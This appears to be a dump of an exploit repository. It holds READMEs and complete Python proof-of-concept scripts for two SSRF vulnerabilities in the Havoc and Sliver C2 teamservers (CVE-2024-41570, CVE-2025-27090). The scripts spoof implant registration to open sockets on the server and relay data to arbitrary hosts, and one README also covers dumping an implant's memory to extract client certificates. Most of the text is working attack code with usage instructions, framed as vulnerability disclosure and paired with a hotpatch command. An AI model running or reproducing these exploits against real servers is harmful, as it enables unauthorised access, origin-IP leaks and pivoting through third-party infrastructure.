 3 | 
 4 | Full analysis: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
 5 | 
 6 | https://github.com/user-attachments/assets/9ab99915-8a8c-4bbd-b762-00280a23703c
 7 | 
 8 | To hotpatch your teamserver:
 9 | 
10 | 1) Navigate to the Havoc directory
11 | 2) Run the command
12 | ```bash
13 | sed -i '/case COMMAND_SOCKET:/,/return true/d' teamserver/pkg/agent/agent.go
14 | ```
15 | 3) Rebuild the teamserver
16 | ```bash
17 | make ts-build
18 | ```
19 | 
20 | ```
21 | usage: exploit.py [-h] -t TARGET -i IP -p PORT [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME]
22 |                   [-n PROCESS_NAME] [-ip INTERNAL_IP]
23 | 
24 | options:
25 |   -h, --help            show this help message and exit
26 |   -t TARGET, --target TARGET
27 |                         The listener target in URL format
28 |   -i IP, --ip IP        The IP to open the socket with
29 |   -p PORT, --port PORT  The port to open the socket with
30 |   -A USER_AGENT, --user-agent USER_AGENT
31 |                         The User Agent for the spoofed agent
32 |   -H HOSTNAME, --hostname HOSTNAME
33 |                         The hostname for the spoofed agent
34 |   -u USERNAME, --username USERNAME
35 |                         The username for the spoofed agent
36 |   -d DOMAIN_NAME, --domain-name DOMAIN_NAME
37 |                         The domain name for the spoofed agent
38 |   -n PROCESS_NAME, --process-name PROCESS_NAME
39 |                         The process name for the spoofed agent
40 |   -ip INTERNAL_IP, --internal-ip INTERNAL_IP
41 |                         The internal ip for the spoofed agent
42 | ```
43 | 


--------------------------------------------------------------------------------
/CVE-2024-41570: Havoc C2 Unauth SSRF/exploit.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
  2 | # Date: 2024-07-13
  3 | # Exploit Author: @_chebuya
  4 | # Software Link: https://github.com/HavocFramework/Havoc
  5 | # Version: v0.7
  6 | # Tested on: Ubuntu 20.04 LTS
  7 | # CVE: CVE-2024-41570
  8 | # Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
  9 | # Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
 10 | # Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
 11 | import binascii
 12 | import random
 13 | import requests
 14 | import argparse
 15 | import urllib3
 16 | urllib3.disable_warnings()
 17 | 
 18 | 
 19 | from Crypto.Cipher import AES
 20 | from Crypto.Util import Counter
 21 | 
 22 | key_bytes = 32
 23 | 
 24 | def decrypt(key, iv, ciphertext):
 25 |     if len(key) <= key_bytes:
 26 |         for _ in range(len(key), key_bytes):
 27 |             key += b"0"
 28 | 
 29 |     assert len(key) == key_bytes
 30 | 
 31 |     iv_int = int(binascii.hexlify(iv), 16)
 32 |     ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
 33 |     aes = AES.new(key, AES.MODE_CTR, counter=ctr)
 34 | 
 35 |     plaintext = aes.decrypt(ciphertext)
 36 |     return plaintext
 37 | 
 38 | 
 39 | def int_to_bytes(value, length=4, byteorder="big"):
 40 |     return value.to_bytes(length, byteorder)
 41 | 
 42 | 
 43 | def encrypt(key, iv, plaintext):
 44 | 
 45 |     if len(key) <= key_bytes:
 46 |         for x in range(len(key),key_bytes):
 47 |             key = key + b"0"
 48 | 
 49 |         assert len(key) == key_bytes
 50 | 
 51 |         iv_int = int(binascii.hexlify(iv), 16)
 52 |         ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
 53 |         aes = AES.new(key, AES.MODE_CTR, counter=ctr)
 54 | 
 55 |         ciphertext = aes.encrypt(plaintext)
 56 |         return ciphertext
 57 | 
 58 | def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
 59 |     # DEMON_INITIALIZE / 99
 60 |     command = b"\x00\x00\x00\x63"
 61 |     request_id = b"\x00\x00\x00\x01"
 62 |     demon_id = agent_id
 63 | 
 64 |     hostname_length = int_to_bytes(len(hostname))
 65 |     username_length = int_to_bytes(len(username))
 66 |     domain_name_length = int_to_bytes(len(domain_name))
 67 |     internal_ip_length = int_to_bytes(len(internal_ip))
 68 |     process_name_length = int_to_bytes(len(process_name) - 6)
 69 | 
 70 |     data =  b"\xab" * 100
 71 | 
 72 |     header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
 73 | 
 74 |     size = 12 + len(header_data)
 75 |     size_bytes = size.to_bytes(4, 'big')
 76 |     agent_header = size_bytes + magic + agent_id
 77 | 
 78 |     print("[***] Trying to register agent...")
 79 |     r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
 80 |     if r.status_code == 200:
 81 |         print("[***] Success!")
 82 |     else:
 83 |         print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")
 84 | 
 85 | 
 86 | def open_socket(socket_id, target_address, target_port):
 87 |     # COMMAND_SOCKET / 2540
 88 |     command = b"\x00\x00\x09\xec"
 89 |     request_id = b"\x00\x00\x00\x02"
 90 | 
 91 |     # SOCKET_COMMAND_OPEN / 16
 92 |     subcommand = b"\x00\x00\x00\x10"
 93 |     sub_request_id = b"\x00\x00\x00\x03"
 94 | 
 95 |     local_addr = b"\x22\x22\x22\x22"
 96 |     local_port = b"\x33\x33\x33\x33"
 97 | 
 98 | 
 99 |     forward_addr = b""
100 |     for octet in target_address.split(".")[::-1]:
101 |         forward_addr += int_to_bytes(int(octet), length=1)
102 | 
103 |     forward_port = int_to_bytes(target_port)
104 | 
105 |     package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port
106 |     package_size = int_to_bytes(len(package) + 4)
107 | 
108 |     header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
109 | 
110 |     size = 12 + len(header_data)
111 |     size_bytes = size.to_bytes(4, 'big')
112 |     agent_header = size_bytes + magic + agent_id
113 |     data = agent_header + header_data
114 | 
115 | 
116 |     print("[***] Trying to open socket on the teamserver...")
117 |     r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
118 |     if r.status_code == 200:
119 |         print("[***] Success!")
120 |     else:
121 |         print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")
122 | 
123 | 
124 | def write_socket(socket_id, data):
125 |     # COMMAND_SOCKET / 2540
126 |     command = b"\x00\x00\x09\xec"
127 |     request_id = b"\x00\x00\x00\x08"
128 | 
129 |     # SOCKET_COMMAND_READ / 11
130 |     subcommand = b"\x00\x00\x00\x11"
131 |     sub_request_id = b"\x00\x00\x00\xa1"
132 | 
133 |     # SOCKET_TYPE_CLIENT / 3
134 |     socket_type = b"\x00\x00\x00\x03"
135 |     success = b"\x00\x00\x00\x01"
136 | 
137 |     data_length = int_to_bytes(len(data))
138 | 
139 |     package = subcommand+socket_id+socket_type+success+data_length+data
140 |     package_size = int_to_bytes(len(package) + 4)
141 | 
142 |     header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
143 | 
144 |     size = 12 + len(header_data)
145 |     size_bytes = size.to_bytes(4, 'big')
146 |     agent_header = size_bytes + magic + agent_id
147 |     post_data = agent_header + header_data
148 | 
149 |     print("[***] Trying to write to the socket")
150 |     r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
151 |     if r.status_code == 200:
152 |         print("[***] Success!")
153 |     else:
154 |         print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")
155 | 
156 | 
157 | def read_socket(socket_id):
158 |     # COMMAND_GET_JOB / 1
159 |     command = b"\x00\x00\x00\x01"
160 |     request_id = b"\x00\x00\x00\x09"
161 | 
162 |     header_data = command + request_id
163 | 
164 |     size = 12 + len(header_data)
165 |     size_bytes = size.to_bytes(4, 'big')
166 |     agent_header = size_bytes + magic + agent_id
167 |     data = agent_header + header_data
168 | 
169 | 
170 |     print("[***] Trying to poll teamserver for socket output...")
171 |     r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
172 |     if r.status_code == 200:
173 |         print("[***] Read socket output successfully!")
174 |     else:
175 |         print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
176 |         return ""
177 | 
178 | 
179 |     command_id = int.from_bytes(r.content[0:4], "little")
180 |     request_id = int.from_bytes(r.content[4:8], "little")
181 |     package_size = int.from_bytes(r.content[8:12], "little")
182 |     enc_package = r.content[12:]
183 | 
184 |     return decrypt(AES_Key, AES_IV, enc_package)[12:]
185 | 
186 | 
187 | 
188 | parser = argparse.ArgumentParser()
189 | parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
190 | parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
191 | parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
192 | parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
193 | parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
194 | parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
195 | parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
196 | parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
197 | parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")
198 | 
199 | args = parser.parse_args()
200 | 
201 | 
202 | # 0xDEADBEEF
203 | magic = b"\xde\xad\xbe\xef"
204 | teamserver_listener_url = args.target
205 | headers = {
206 |         "User-Agent": args.user_agent
207 | }
208 | agent_id = int_to_bytes(random.randint(100000, 1000000))
209 | AES_Key = b"\x00" * 32
210 | AES_IV = b"\x00" * 16
211 | hostname = bytes(args.hostname, encoding="utf-8")
212 | username = bytes(args.username, encoding="utf-8")
213 | domain_name = bytes(args.domain_name, encoding="utf-8")
214 | internal_ip = bytes(args.internal_ip, encoding="utf-8")
215 | process_name = args.process_name.encode("utf-16le")
216 | process_id = int_to_bytes(random.randint(1000, 5000))
217 | 
218 | register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)
219 | 
220 | socket_id = b"\x11\x11\x11\x11"
221 | open_socket(socket_id, args.ip, int(args.port))
222 | 
223 | request_data = b"GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"
224 | write_socket(socket_id, request_data)
225 | print(read_socket(socket_id).decode())
226 | 


--------------------------------------------------------------------------------
/CVE-2024-46506: Unauthenticated RCE in NetAlertx:
--------------------------------------------------------------------------------
1 | Blog: https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/
2 | 


--------------------------------------------------------------------------------
/CVE-2024-46507: Yeti Platform SSTI:
--------------------------------------------------------------------------------
1 | Blog: https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/
2 | 


--------------------------------------------------------------------------------
/CVE-2025-27090: Sliver C2 SSRF/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2025-27090: Sliver-C2-SSRF-poc
 2 | Sliver teamserver SSRF poc
 3 | 
 4 | Full analysis: https://blog.chebuya.com/posts/server-side-request-forgery-on-sliver-c2/
 5 | 
 6 | v1.5.26 to v1.5.42
 7 | 
 8 | v1.6.0 < 0f340a2
 9 | 
10 | This vulnerability is exploited by spoofing an implant registration and checkins to open a TCP socket on the teamserver and read/write data from it
11 | 
12 | https://github.com/user-attachments/assets/43550631-80fc-4dab-ad62-2237a838b506
13 | 
14 | 
15 | ## To run
16 | 
17 | Install RogueSliver
18 | ```
19 | git clone https://github.com/ACE-Responder/RogueSliver.git
20 | cd RogueSliver
21 | pip3 install -r requirements.txt --break-system-packages
22 | ```
23 | 
24 | Find an implant/stager for target teamserver, run it, then Task manager -> Find process -> Create memory dump file
25 | 
26 | Extract implant certificates
27 | ```
28 | python3 ExtractCerts.py implant.dmp
29 | ```
30 | 
31 | Run the poc
32 | ```
33 | python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT>
34 | python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
35 | ```
36 | 


--------------------------------------------------------------------------------
/CVE-2025-27090: Sliver C2 SSRF/exploit.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: Sliver C2 SSRF
  2 | # Date: 2025-02-19
  3 | # Exploit Author: @_chebuya
  4 | # Software Link: https://github.com/BishopFox/sliver
  5 | # Version: v1.5.26 to v1.5.42, v1.6.0 < 0f340a2
  6 | # Tested on: Ubuntu 24.04 LTS
  7 | # CVE: CVE-2025-27090
  8 | # Description: This exploit works by spoofing a implant registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
  9 | # Github: https://github.com/chebuya/exploits/tree/main/CVE-2025-27090%3A%20Sliver%20C2%20SSRF
 10 | # Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-sliver-c2/
 11 | import argparse
 12 | import base64
 13 | import string
 14 | import json
 15 | import random
 16 | import socket
 17 | import ssl
 18 | import struct
 19 | import sys
 20 | import time
 21 | 
 22 | from google.protobuf import json_format
 23 | from rich import print
 24 | 
 25 | import RogueSliver.sliver_pb2 as sliver
 26 | from RogueSliver.consts import msgs
 27 | 
 28 | 
 29 | def generate_registration_envelope():
 30 |     random_string = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(10))
 31 |     register_data = {
 32 |             "Name": random_string,
 33 |             "Hostname": "chebuya-" + random_string + ".local",
 34 |             "Uuid": "uuid"+ random_string,
 35 |             "Username": "username"+ random_string,
 36 |             "Uid": "uid"+ random_string,
 37 |             "Gid": "gid"+ random_string,
 38 |             "Os": "os"+ random_string,
 39 |             "Arch": "arch"+ random_string,
 40 |             "Pid": 1337,
 41 |             "Filename": "filename"+ random_string,
 42 |             "ActiveC2": "activec2"+ random_string,
 43 |             "Version": "version"+ random_string,
 44 |             "ReconnectInterval": 1337,
 45 |             "ConfigID": "config_id"+ random_string,
 46 |             "PeerID": -1337,
 47 |             "Locale": "locale" + random_string
 48 |             }
 49 | 
 50 |     register = sliver.Register()
 51 |     json_format.Parse(json.dumps(register_data), register)
 52 |     envelope = sliver.Envelope()
 53 |     envelope.Type = msgs.index('Register')
 54 |     envelope.Data = register.SerializeToString()
 55 | 
 56 |     return envelope
 57 | 
 58 | 
 59 | def generate_create_reverse_tunnel_envelope(ip, port, data):
 60 |     tunnel_data = {
 61 |             "Data": base64.b64encode(data).decode(),
 62 |             "Closed": False,
 63 |             "Sequence": 0,
 64 |             "Ack": 0,
 65 |             "Resend": False,
 66 |             "CreateReverse": True,
 67 |             "rportfwd": {
 68 |                 "Port": port,
 69 |                 "Host": ip,
 70 |                 "TunnelID": 1,
 71 |                 },
 72 |             "TunnelID": 1,
 73 |             }
 74 | 
 75 |     tunnel = sliver.TunnelData()
 76 |     json_format.Parse(json.dumps(tunnel_data), tunnel)
 77 |     envelope = sliver.Envelope()
 78 |     envelope.Type = msgs.index('TunnelData')
 79 |     envelope.Data = tunnel.SerializeToString()
 80 | 
 81 |     return envelope
 82 | 
 83 | 
 84 | def exploit(ip, port, callback_ip, callback_port, data, cert_path, key_path):
 85 |     ssl_ctx = ssl.create_default_context()
 86 |     ssl_ctx.load_cert_chain(keyfile=key_path, certfile=cert_path)
 87 |     ssl_ctx.check_hostname = False
 88 |     ssl_ctx.verify_mode = ssl.CERT_NONE
 89 | 
 90 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
 91 |         with ssl_ctx.wrap_socket(s,) as ssock:
 92 |             ssock.connect((ip, port))
 93 |             ssock.settimeout(0.5)
 94 | 
 95 |             print("[***] Registering session")
 96 |             registration_envelope = generate_registration_envelope().SerializeToString()
 97 |             registration_envelope_len = struct.pack('I', len(registration_envelope))
 98 |             ssock.write(registration_envelope_len + registration_envelope)
 99 |             time.sleep(0.5)
100 |    
101 |             print("[***] Creating tunnel")
102 |             reverse_tunnel_envelope = generate_create_reverse_tunnel_envelope(callback_ip, callback_port, data).SerializeToString()
103 |             reverse_tunnel_envelope_len = struct.pack('I', len(reverse_tunnel_envelope))
104 |             ssock.write(reverse_tunnel_envelope_len + reverse_tunnel_envelope)
105 |             print("[***] Sent data\n" + data.decode().rstrip())
106 | 
107 |             print("[***] Reading from connection")
108 |             for i in range(4):
109 |                 try:
110 |                     print(ssock.read().decode(errors='ignore'))
111 |                 except: continue
112 | 
113 | 
114 | 
115 | parser = argparse.ArgumentParser()
116 | 
117 | parser.add_argument("-t", "--target", help="The IP of the target teamserver", required=True)
118 | parser.add_argument("-tp", "--target-port", help="The port of the target listener", type=int, required=True)
119 | parser.add_argument("-i", "--ip", help="The IP to send data to", required=True)
120 | parser.add_argument("-p", "--port", help="The port to send data to", type=int, required=True)
121 | parser.add_argument("-c", "--client-certificate", help="The path to the client certificate", default="certs/client.crt")
122 | parser.add_argument("-k", "--client-key", help="The path to the client key", default="certs/client.key")
123 | parser.add_argument("-d", "--data", help="The data to send", default="GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n")
124 | 
125 | args = parser.parse_args()
126 | 
127 | exploit(args.target, args.target_port, args.ip, args.port, args.data.encode(), args.client_certificate, args.client_key)
128 | 
129 | 


--------------------------------------------------------------------------------